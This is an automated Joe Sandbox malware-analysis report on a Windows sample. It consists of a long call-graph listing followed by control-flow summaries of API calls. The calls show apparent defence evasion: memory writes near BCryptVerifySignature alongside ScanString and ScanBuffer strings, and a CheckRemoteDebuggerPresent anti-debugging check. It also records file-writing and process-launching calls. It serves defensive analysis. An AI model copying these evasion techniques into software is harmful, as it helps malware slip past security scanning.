76578 2d347ec 11 API calls 76574->76578 76579 2d347ec 11 API calls 76575->76579 76584 2d347ec 11 API calls 76576->76584 76591 2d59870 76578->76591 76589 2d59b47 76579->76589 76586 2d489d0 20 API calls 76580->76586 76581 2d56949 76583 2d34860 11 API calls 76581->76583 76582->76581 76585 2d34860 11 API calls 76582->76585 76594 2d5696a 76583->76594 76595 2d57ec1 76584->76595 76592 2d5670c 76585->76592 76587 2d5a02d 76586->76587 76590 2d34860 11 API calls 76587->76590 76597 2d489d0 20 API calls 76589->76597 76607 2d5a04e 76590->76607 76596 2d489d0 20 API calls 76591->76596 76601 2d347ec 11 API calls 76592->76601 76603 2d347ec 11 API calls 76594->76603 76604 2d489d0 20 API calls 76595->76604 76599 2d59894 76596->76599 76600 2d59b6b 76597->76600 76605 2d34860 11 API calls 76599->76605 76606 2d34860 11 API calls 76600->76606 76610 2d56743 76601->76610 76612 2d569a1 76603->76612 76608 2d57ee5 76604->76608 76615 2d598b5 76605->76615 76616 2d59b8c 76606->76616 76609 2d347ec 11 API calls 76607->76609 77523 2d349f8 76608->77523 76624 2d5a085 76609->76624 76618 2d489d0 20 API calls 76610->76618 76620 2d489d0 20 API calls 76612->76620 76622 2d347ec 11 API calls 76615->76622 76623 2d347ec 11 API calls 76616->76623 76625 2d56767 76618->76625 76626 2d569c5 76620->76626 76621 2d57f08 76628 2d34860 11 API calls 76621->76628 76632 2d598ec 76622->76632 76633 2d59bc3 76623->76633 76630 2d489d0 20 API calls 76624->76630 76629 2d34860 11 API calls 76625->76629 76627 2d34860 11 API calls 76626->76627 76636 2d569e6 76627->76636 76637 2d57f29 76628->76637 76634 2d56788 76629->76634 76639 2d5a0a9 76630->76639 76641 2d489d0 20 API calls 76632->76641 76638 2d489d0 20 API calls 76633->76638 76644 2d347ec 11 API calls 76634->76644 76646 2d347ec 11 API calls 76636->76646 76647 2d347ec 11 API calls 76637->76647 76643 2d59be7 76638->76643 76650 2d489d0 20 API calls 76639->76650 76642 2d59910 76641->76642 76648 2d34860 11 API calls 76642->76648 76649 2d34860 11 API calls 76643->76649 76651 2d567bf 
76644->76651 76653 2d56a1d 76646->76653 76654 2d57f60 76647->76654 76655 2d59931 76648->76655 76656 2d59c08 76649->76656 76657 2d5a0dc 76650->76657 76658 2d489d0 20 API calls 76651->76658 76660 2d489d0 20 API calls 76653->76660 76661 2d489d0 20 API calls 76654->76661 76663 2d347ec 11 API calls 76655->76663 76664 2d347ec 11 API calls 76656->76664 76665 2d489d0 20 API calls 76657->76665 76666 2d567e3 76658->76666 76667 2d56a41 76660->76667 76662 2d57f84 76661->76662 76668 2d34860 11 API calls 76662->76668 76672 2d59968 76663->76672 76673 2d59c3f 76664->76673 76674 2d5a10f 76665->76674 76669 2d34860 11 API calls 76666->76669 76670 2d34860 11 API calls 76667->76670 76676 2d57fa5 76668->76676 76677 2d56804 76669->76677 76675 2d56a62 76670->76675 76680 2d489d0 20 API calls 76672->76680 76681 2d489d0 20 API calls 76673->76681 76682 2d489d0 20 API calls 76674->76682 76686 2d347ec 11 API calls 76675->76686 76687 2d347ec 11 API calls 76676->76687 76684 2d347ec 11 API calls 76677->76684 76688 2d5998c 76680->76688 76683 2d59c63 76681->76683 76695 2d5a142 76682->76695 76689 2d34860 11 API calls 76683->76689 76697 2d5683b 76684->76697 76698 2d56a99 76686->76698 76699 2d57fdc 76687->76699 76692 2d4e358 11 API calls 76688->76692 76701 2d59c84 76689->76701 76693 2d599a1 76692->76693 76694 2d34530 11 API calls 76693->76694 76696 2d599b1 76694->76696 76702 2d489d0 20 API calls 76695->76702 76700 2d34860 11 API calls 76696->76700 76704 2d489d0 20 API calls 76697->76704 76705 2d489d0 20 API calls 76698->76705 76706 2d489d0 20 API calls 76699->76706 76715 2d599d2 76700->76715 76707 2d347ec 11 API calls 76701->76707 76716 2d5a175 76702->76716 76708 2d5685f 76704->76708 76710 2d56abd 76705->76710 76711 2d58000 76706->76711 76718 2d59cbb 76707->76718 76712 2d34860 11 API calls 76708->76712 76713 2d34860 11 API calls 76710->76713 76714 2d34860 11 API calls 76711->76714 76724 2d56880 76712->76724 76721 2d56ade 76713->76721 76722 2d58021 76714->76722 76717 2d347ec 11 API calls 76715->76717 
76719 2d489d0 20 API calls 76716->76719 76734 2d59a09 76717->76734 76726 2d489d0 20 API calls 76718->76726 76723 2d5a1a8 76719->76723 76729 2d347ec 11 API calls 76721->76729 76730 2d347ec 11 API calls 76722->76730 76727 2d34860 11 API calls 76723->76727 76732 2d347ec 11 API calls 76724->76732 76731 2d59cdf 76726->76731 76738 2d5a1c9 76727->76738 76742 2d56b15 76729->76742 76743 2d58058 76730->76743 76735 2d349f8 11 API calls 76731->76735 76741 2d568b7 76732->76741 76739 2d489d0 20 API calls 76734->76739 76736 2d59ce9 76735->76736 77531 2d48d70 31 API calls 76736->77531 76745 2d347ec 11 API calls 76738->76745 76740 2d59a2d 76739->76740 76744 2d34860 11 API calls 76740->76744 76747 2d489d0 20 API calls 76741->76747 76748 2d489d0 20 API calls 76742->76748 76749 2d489d0 20 API calls 76743->76749 76757 2d59a4e 76744->76757 76758 2d5a200 76745->76758 76750 2d568db 76747->76750 76752 2d56b39 76748->76752 76753 2d5807c 76749->76753 76754 2d34860 11 API calls 76750->76754 76755 2d34860 11 API calls 76752->76755 76756 2d34860 11 API calls 76753->76756 76772 2d568fc 76754->76772 76764 2d56b5a 76755->76764 76762 2d5809d 76756->76762 76759 2d347ec 11 API calls 76757->76759 76760 2d489d0 20 API calls 76758->76760 76771 2d59a85 76759->76771 76763 2d5a224 76760->76763 76768 2d347ec 11 API calls 76762->76768 76765 2d34860 11 API calls 76763->76765 76767 2d347ec 11 API calls 76764->76767 76774 2d5a245 76765->76774 76776 2d56b91 76767->76776 76777 2d580d4 76768->76777 76773 2d489d0 20 API calls 76771->76773 76775 2d4dc8c 17 API calls 76772->76775 76788 2d59aa9 76773->76788 76778 2d347ec 11 API calls 76774->76778 76775->76581 76780 2d489d0 20 API calls 76776->76780 76781 2d489d0 20 API calls 76777->76781 76787 2d5a27c 76778->76787 76783 2d56bb5 76780->76783 76784 2d580f8 76781->76784 76785 2d34860 11 API calls 76783->76785 77530 2d4b118 39 API calls 76784->77530 76793 2d56bd6 76785->76793 76790 2d489d0 20 API calls 76787->76790 76789 2d4dc8c 17 API calls 76788->76789 76789->76561 
76797 2d5a2a0 76790->76797 76792 2d58109 76796 2d347ec 11 API calls 76793->76796 76800 2d56c0d 76796->76800 76799 2d489d0 20 API calls 76797->76799 76801 2d5a2d3 76799->76801 76804 2d489d0 20 API calls 76800->76804 76803 2d34860 11 API calls 76801->76803 76808 2d5a2f4 76803->76808 76806 2d56c31 76804->76806 76807 2d34860 11 API calls 76806->76807 76811 2d56c52 76807->76811 76809 2d347ec 11 API calls 76808->76809 76815 2d5a32b 76809->76815 76814 2d347ec 11 API calls 76811->76814 76818 2d56c89 76814->76818 76817 2d489d0 20 API calls 76815->76817 76819 2d5a34f 76817->76819 76822 2d489d0 20 API calls 76818->76822 76821 2d34860 11 API calls 76819->76821 76825 2d5a370 76821->76825 76824 2d56cad 76822->76824 76826 2d34860 11 API calls 76824->76826 76827 2d347ec 11 API calls 76825->76827 76831 2d56ced 76826->76831 76832 2d5a3a7 76827->76832 76834 2d347ec 11 API calls 76831->76834 76835 2d489d0 20 API calls 76832->76835 76839 2d56d24 76834->76839 76836 2d5a3cb 76835->76836 76837 2d34860 11 API calls 76836->76837 76842 2d5a3ec 76837->76842 76841 2d489d0 20 API calls 76839->76841 76843 2d56d48 76841->76843 76844 2d347ec 11 API calls 76842->76844 76846 2d34860 11 API calls 76843->76846 76849 2d5a423 76844->76849 76852 2d56d77 76846->76852 76851 2d489d0 20 API calls 76849->76851 76857 2d5a447 76851->76857 77519 2d37990 11 API calls 76852->77519 76855 2d56da1 76856 2d347ec 11 API calls 76855->76856 76859 2d56db7 76856->76859 76860 2d489d0 20 API calls 76857->76860 76861 2d34860 11 API calls 76859->76861 76863 2d5a47a 76860->76863 76866 2d56de8 76861->76866 76867 2d489d0 20 API calls 76863->76867 76869 2d347ec 11 API calls 76866->76869 76870 2d5a4ad 76867->76870 76872 2d56e1f 76869->76872 76873 2d489d0 20 API calls 76870->76873 76875 2d489d0 20 API calls 76872->76875 76879 2d5a4e0 76873->76879 76876 2d56e43 76875->76876 76877 2d34860 11 API calls 76876->76877 76884 2d56e64 76877->76884 76881 2d489d0 20 API calls 76879->76881 76882 2d5a513 76881->76882 76885 2d34860 11 API calls 
76882->76885 76887 2d347ec 11 API calls 76884->76887 76888 2d5a534 76885->76888 76890 2d56e9b 76887->76890 76891 2d347ec 11 API calls 76888->76891 76893 2d489d0 20 API calls 76890->76893 76895 2d5a56b 76891->76895 76894 2d56ebf 76893->76894 77520 2d37990 11 API calls 76894->77520 76900 2d489d0 20 API calls 76895->76900 76899 2d56ed5 76902 2d347ec 11 API calls 76899->76902 76903 2d5a58f 76900->76903 76905 2d56eeb 76902->76905 76906 2d34860 11 API calls 76903->76906 76907 2d34860 11 API calls 76905->76907 76908 2d5a5b0 76906->76908 76912 2d56f1c 76907->76912 76910 2d347ec 11 API calls 76908->76910 76914 2d5a5e7 76910->76914 76913 2d347ec 11 API calls 76912->76913 76918 2d56f53 76913->76918 76916 2d489d0 20 API calls 76914->76916 76923 2d5a60b 76916->76923 76921 2d489d0 20 API calls 76918->76921 76922 2d56f77 76921->76922 76924 2d34860 11 API calls 76922->76924 76925 2d489d0 20 API calls 76923->76925 76928 2d56f98 76924->76928 76929 2d5a63e 76925->76929 76930 2d347ec 11 API calls 76928->76930 76931 2d489d0 20 API calls 76929->76931 76935 2d56fcf 76930->76935 76936 2d5a671 76931->76936 76938 2d489d0 20 API calls 76935->76938 76940 2d489d0 20 API calls 76936->76940 76939 2d56ff3 76938->76939 76941 2d34860 11 API calls 76939->76941 76943 2d5a6a4 76940->76943 76945 2d5702d 76941->76945 76946 2d489d0 20 API calls 76943->76946 77373 2d44dd4 76945->77373 76948 2d5a6d7 76946->76948 76952 2d489d0 20 API calls 76948->76952 76951 2d57055 76954 2d5a70a 76952->76954 76955 2d34860 11 API calls 76954->76955 76958 2d5a72b 76955->76958 76959 2d347ec 11 API calls 76958->76959 76961 2d5a762 76959->76961 76964 2d489d0 20 API calls 76961->76964 76965 2d5a786 76964->76965 76966 2d34860 11 API calls 76965->76966 76972 2d5a7a7 76966->76972 76975 2d347ec 11 API calls 76972->76975 76979 2d5a7de 76975->76979 76982 2d489d0 20 API calls 76979->76982 76984 2d5a802 76982->76984 76985 2d34860 11 API calls 76984->76985 76987 2d5a823 76985->76987 76989 2d347ec 11 API calls 76987->76989 76991 2d5a85a 
76989->76991 76994 2d489d0 20 API calls 76991->76994 76996 2d5a87e 76994->76996 76997 2d34860 11 API calls 76996->76997 76999 2d5a89f 76997->76999 77001 2d347ec 11 API calls 76999->77001 77004 2d5a8d6 77001->77004 77005 2d489d0 20 API calls 77004->77005 77006 2d5a8fa 77005->77006 77007 2d34860 11 API calls 77006->77007 77008 2d5a91b 77007->77008 77009 2d347ec 11 API calls 77008->77009 77010 2d5a952 77009->77010 77011 2d489d0 20 API calls 77010->77011 77012 2d5a976 77011->77012 77013 2d489d0 20 API calls 77012->77013 77014 2d5a985 77013->77014 77015 2d489d0 20 API calls 77014->77015 77016 2d5a994 77015->77016 77017 2d489d0 20 API calls 77016->77017 77018 2d5a9a3 77017->77018 77019 2d489d0 20 API calls 77018->77019 77020 2d5a9b2 77019->77020 77021 2d489d0 20 API calls 77020->77021 77022 2d5a9c1 77021->77022 77023 2d489d0 20 API calls 77022->77023 77024 2d5a9d0 77023->77024 77025 2d489d0 20 API calls 77024->77025 77026 2d5a9df 77025->77026 77027 2d489d0 20 API calls 77026->77027 77028 2d5a9ee 77027->77028 77141 2d4f0b9 77140->77141 77142 2d4f0e5 77141->77142 77532 2d346c4 11 API calls 77141->77532 77533 2d34530 11 API calls 77141->77533 77144 2d344dc 11 API calls 77142->77144 77145 2d4f0fa 77144->77145 77145->75605 77148 2d34bcc 11 API calls 77147->77148 77149 2d4e370 77148->77149 77150 2d4e391 77149->77150 77151 2d349f8 11 API calls 77149->77151 77150->75639 77151->77149 77153 2d4dca2 77152->77153 77534 2d34f20 77153->77534 77155 2d4dcaa 77156 2d4dcca RtlDosPathNameToNtPathName_U 77155->77156 77538 2d4dbdc 77156->77538 77158 2d4dce6 NtCreateFile 77159 2d4dd11 77158->77159 77160 2d349f8 11 API calls 77159->77160 77161 2d4dd23 NtWriteFile NtClose 77160->77161 77162 2d4dd4d 77161->77162 77539 2d34c60 77162->77539 77165 2d344dc 11 API calls 77166 2d4dd5d Sleep 77165->77166 77166->75643 77168 2d4e681 77167->77168 77168->77168 77169 2d34860 11 API calls 77168->77169 77170 2d4e6ca 77169->77170 77171 2d347ec 11 API calls 77170->77171 77172 2d4e6ef 77171->77172 77173 2d489d0 
20 API calls 77172->77173 77174 2d4e70a 77173->77174 77175 2d34860 11 API calls 77174->77175 77176 2d4e723 77175->77176 77177 2d347ec 11 API calls 77176->77177 77178 2d4e748 77177->77178 77179 2d489d0 20 API calls 77178->77179 77180 2d4e763 77179->77180 77181 2d34860 11 API calls 77180->77181 77182 2d4e77c 77181->77182 77183 2d347ec 11 API calls 77182->77183 77184 2d4e7a1 77183->77184 77185 2d489d0 20 API calls 77184->77185 77186 2d4e7bc 77185->77186 77187 2d34860 11 API calls 77186->77187 77188 2d4e7ee 77187->77188 77189 2d489d0 20 API calls 77188->77189 77190 2d4e838 77189->77190 77191 2d34860 11 API calls 77190->77191 77192 2d4e86f 77191->77192 77193 2d347ec 11 API calls 77192->77193 77194 2d4e894 77193->77194 77195 2d489d0 20 API calls 77194->77195 77196 2d4e8af 77195->77196 77197 2d34860 11 API calls 77196->77197 77198 2d4e8c8 77197->77198 77199 2d347ec 11 API calls 77198->77199 77200 2d4e8ed 77199->77200 77201 2d489d0 20 API calls 77200->77201 77202 2d4e908 77201->77202 77203 2d34860 11 API calls 77202->77203 77204 2d4e921 77203->77204 77205 2d347ec 11 API calls 77204->77205 77206 2d4e946 77205->77206 77207 2d489d0 20 API calls 77206->77207 77208 2d4e961 77207->77208 77542 2d37f2c 77208->77542 77210 2d4e985 77546 2d48788 77210->77546 77213 2d34860 11 API calls 77214 2d4ea0a 77213->77214 77215 2d347ec 11 API calls 77214->77215 77216 2d4ea3b 77215->77216 77217 2d489d0 20 API calls 77216->77217 77218 2d4ea5f 77217->77218 77219 2d34860 11 API calls 77218->77219 77220 2d4ea7b 77219->77220 77221 2d347ec 11 API calls 77220->77221 77222 2d4eaac 77221->77222 77223 2d489d0 20 API calls 77222->77223 77224 2d4ead0 77223->77224 77225 2d34860 11 API calls 77224->77225 77226 2d4eaec 77225->77226 77227 2d347ec 11 API calls 77226->77227 77228 2d4eb1d 77227->77228 77229 2d489d0 20 API calls 77228->77229 77230 2d4eb41 77229->77230 77231 2d34860 11 API calls 77230->77231 77232 2d4eb5d 77231->77232 77233 2d347ec 11 API calls 77232->77233 77234 2d4eb7b 77233->77234 77235 2d4894c 
21 API calls 77234->77235 77236 2d4eb90 77235->77236 77237 2d34860 11 API calls 77236->77237 77238 2d4ebac 77237->77238 77239 2d347ec 11 API calls 77238->77239 77240 2d4ebca 77239->77240 77241 2d4894c 21 API calls 77240->77241 77242 2d4ebdf 77241->77242 77243 2d34860 11 API calls 77242->77243 77244 2d4ebfb 77243->77244 77245 2d347ec 11 API calls 77244->77245 77246 2d4ec19 77245->77246 77247 2d4894c 21 API calls 77246->77247 77248 2d4ec2e 77247->77248 77249 2d34860 11 API calls 77248->77249 77250 2d4ec4a 77249->77250 77251 2d347ec 11 API calls 77250->77251 77252 2d4ec68 77251->77252 77253 2d4894c 21 API calls 77252->77253 77254 2d4ec7d 77253->77254 77255 2d4ec87 77254->77255 77256 2d4eee2 77254->77256 77257 2d34860 11 API calls 77255->77257 77258 2d34500 11 API calls 77256->77258 77261 2d4eca3 77257->77261 77259 2d4eeff 77258->77259 77260 2d34c60 SysFreeString 77259->77260 77262 2d4ef0a 77260->77262 77264 2d347ec 11 API calls 77261->77264 77263 2d34500 11 API calls 77262->77263 77265 2d4ef1a 77263->77265 77269 2d4ecd4 77264->77269 77266 2d34c60 SysFreeString 77265->77266 77267 2d4ef22 77266->77267 77268 2d34500 11 API calls 77267->77268 77270 2d4ef2f 77268->77270 77271 2d489d0 20 API calls 77269->77271 77270->75663 77272 2d4ecf8 77271->77272 77273 2d34860 11 API calls 77272->77273 77274 2d4ed14 77273->77274 77275 2d347ec 11 API calls 77274->77275 77276 2d4ed45 77275->77276 77277 2d489d0 20 API calls 77276->77277 77278 2d4ed69 WaitForSingleObject CloseHandle CloseHandle 77277->77278 77279 2d34860 11 API calls 77278->77279 77280 2d4eda0 77279->77280 77281 2d347ec 11 API calls 77280->77281 77282 2d4edbe 77281->77282 77283 2d4894c 21 API calls 77282->77283 77284 2d4edd3 77283->77284 77285 2d34860 11 API calls 77284->77285 77286 2d4edef 77285->77286 77287 2d347ec 11 API calls 77286->77287 77288 2d4ee0d 77287->77288 77289 2d4894c 21 API calls 77288->77289 77290 2d4ee22 77289->77290 77291 2d34860 11 API calls 77290->77291 77292 2d4ee3e 77291->77292 77293 2d347ec 11 API 
calls 77292->77293 77294 2d4ee5c 77293->77294 77295 2d4894c 21 API calls 77294->77295 77296 2d4ee71 77295->77296 77297 2d34860 11 API calls 77296->77297 77298 2d4ee8d 77297->77298 77299 2d347ec 11 API calls 77298->77299 77300 2d4eeab 77299->77300 77301 2d4894c 21 API calls 77300->77301 77302 2d4eec0 77301->77302 77303 2d4894c 21 API calls 77302->77303 77304 2d4eed1 77303->77304 77305 2d4894c 21 API calls 77304->77305 77305->77256 77307 2d349a4 77306->77307 77307->75685 77309 2d48973 GetProcAddress 77308->77309 77310 2d489bb 77308->77310 77311 2d489b0 FreeLibrary 77309->77311 77312 2d4898d 77309->77312 77310->75745 77311->77310 77313 2d47d78 18 API calls 77312->77313 77314 2d489a5 77313->77314 77314->77311 77316 2d34f20 SysAllocStringLen 77315->77316 77317 2d4dc16 RtlI 77316->77317 77319 2d4dc3a 77317->77319 77320 2d4dc41 RtlDosPathNameToNtPathName_U 77319->77320 77570 2d4dbdc 77320->77570 77322 2d4dc5d NtDeleteFile 77323 2d4dc75 77322->77323 77324 2d34c60 SysFreeString 77323->77324 77325 2d4dc7d 77324->77325 77325->75983 77333 2d4e3ba 77326->77333 77327 2d4e45c 77328 2d34bcc 11 API calls 77327->77328 77329 2d4e471 77328->77329 77330 2d34530 11 API calls 77329->77330 77332 2d4e47c 77330->77332 77335 2d344dc 11 API calls 77332->77335 77333->77327 77571 2d346c4 11 API calls 77333->77571 77572 2d34530 11 API calls 77333->77572 77336 2d4e491 77335->77336 77337 2d34500 11 API calls 77336->77337 77338 2d4e49e 77337->77338 77338->76064 77340 2d37adc 77339->77340 77341 2d37afd 77340->77341 77573 2d37660 42 API calls 77340->77573 77343 2d4f16c 77341->77343 77344 2d4f189 77343->77344 77345 2d4f1e7 77344->77345 77574 2d346c4 11 API calls 77344->77574 77575 2d34530 11 API calls 77344->77575 77346 2d344dc 11 API calls 77345->77346 77348 2d4f1fc 77346->77348 77349 2d344dc 11 API calls 77348->77349 77351 2d4f204 77349->77351 77351->76082 77353 2d34530 11 API calls 77352->77353 77356 2d4f11c 77353->77356 77354 2d4f163 77354->76112 77355 2d349f8 11 API calls 77355->77356 
[Call-graph edge listing (graph rendering data: node ids, basic-block addresses and edges for module base 02D30000, with executed / not-executed colouring). The Win32 and native API calls reached along these paths are GetFileAttributesA, WinExec, WriteFile, CreateFileA, GetLastError, CreateProcessAsUserW, NtAllocateVirtualMemory, SysAllocStringLen, SysReAllocStringLen, SysFreeString, timeSetEvent, GetMessageA, TranslateMessage, DispatchMessageA, GetStdHandle, MessageBoxA, FreeLibrary, ExitProcess, GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpynA, lstrlenA, GetThreadLocale, GetLocaleInfoA, LoadLibraryExA, VirtualAlloc, VirtualFree and Sleep.]

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph of function 02D35ACC, legend: executed / not executed. Its basic blocks call GetModuleFileNameA, RegOpenKeyExA (three key probes), RegQueryValueExA, RegCloseKey, lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA and up to three lstrcpynA/LoadLibraryExA pairs; the calls are listed under APIs.]
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D30000,02D5E790), ref: 02D35AE8
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B06
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B24
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D35B42
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D35B8B
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,02D35D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001), ref: 02D35BA9
                                                                                                                        • RegCloseKey.ADVAPI32(?,02D35BD8,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D35BCB
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D35BE8
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D35BF5
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D35BFB
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D35C26
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35C6D
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35C7D
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35CA5
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35CB5
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D35CDB
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D35CEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                                        • Opcode ID: 2dbba8a81f5606dabf08fa30b30678177b1ca9abe34338acb7f2e258a3643ffd
                                                                                                                        • Instruction ID: af31052ee16eb04dd3f6bb677c83e0e38fb1b1c24a9c9576346dd95892cdadc5
                                                                                                                        • Opcode Fuzzy Hash: 2dbba8a81f5606dabf08fa30b30678177b1ca9abe34338acb7f2e258a3643ffd
                                                                                                                        • Instruction Fuzzy Hash: BF517775A4025D7AFB22D6A4DC46FEF77ADDB08744F8041A1AA04E6281D774DE44CF70

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph of function 02D4894C, legend: executed / not executed: LoadLibraryW, then GetProcAddress, then a call into 02D47D78, then FreeLibrary; the calls are listed under APIs.]
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                          • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                        • Opcode ID: fe827b1dee6edee07b4021f4c6e84a2b8d2a71865e55388f815b74edc99dbcba
                                                                                                                        • Instruction ID: 2ac33b1b1f682402b5783fa6f8e06e4ef060739b33c4453d5269560c41762f0e
                                                                                                                        • Opcode Fuzzy Hash: fe827b1dee6edee07b4021f4c6e84a2b8d2a71865e55388f815b74edc99dbcba
                                                                                                                        • Instruction Fuzzy Hash: F3F08C72AC1244EFF312AA68EC59B96B79CE7C1694F000969A9AA97380CB705C50CB60

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph of function 02D4F744, legend: executed / not executed: GetModuleHandleW, then GetProcAddress, then CheckRemoteDebuggerPresent; the calls are listed under APIs.]
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02D4F754
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D4F766
                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D4F77D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
